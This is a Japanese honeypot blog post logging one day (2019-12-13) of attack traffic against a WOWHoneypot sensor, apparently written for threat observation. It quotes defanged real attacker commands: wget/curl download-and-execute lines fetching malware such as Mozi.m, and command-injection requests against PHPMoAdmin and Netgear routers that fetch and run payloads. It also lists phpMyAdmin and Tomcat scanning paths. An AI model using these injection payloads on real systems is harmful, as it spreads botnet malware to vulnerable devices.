23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(272日目)

2019/12/13(金)

トータルは506件でした。

ハンティングログは以下です。

61.206.220[.]246 wget+hxxp[:]//94.177.249[.]95/mipsel

www.virustotal.com

208.97.139[.]102 wget hxxp[:]//145.249.106.241/richard; curl -O hxxp[:]//145.249.106[.]241/richard
208.97.139[.]102 curl -O hxxp[:]//145.249.106.241/richard
www.virustotal.com
www.virustotal.com

222.137.135[.]143 wget+hxxp[:]//222.137.135.143:52699/Mozi.m|
www.virustotal.com
www.virustotal.com

件数 概要 リクエス
424 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
48 アクセス GET /
2 PHPMoAdminの脆弱性を狙った通信 POST /moadmin/moadmin.php?object=1;system(wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard);exit
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 GET hxxp[:]//www.ceek.jp/?0.5868606403708541299088
1 不正中継の調査 GET hxxp[:]//mail.21cn.com/?0.346522739226757363939240
1 Netgearルータの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//222.137.135.143:52699/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 Netgearルータの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 phpMyAdminの調査 GET /sqladmin/scripts/setup.php
1 phpMyAdminの調査 GET /sql/scripts/setup.php
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /php/scripts/setup.php
1 phpMyAdminの調査 GET /phmyadm/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadm/scripts/setup.php
1 phpMyAdminの調査 GET /muieblackcat
1 phpMyAdminの調査 GET /is_test
1 phpMyAdminの調査 GET /admin/connection/
1 phpMyAdminの調査 GET /SQLadmin/scripts/setup.php
1 phpMyAdminの調査 GET /SQL/setup.php
1 phpMyAdminの調査 GET /SQL/scripts/setup.php
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET //pma/scripts/setup.php
1 phpMyAdminの調査 GET //phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET //phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET //myadmin/scripts/setup.php
1 phpMyAdminの調査 GET //MyAdmin/scripts/setup.php
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt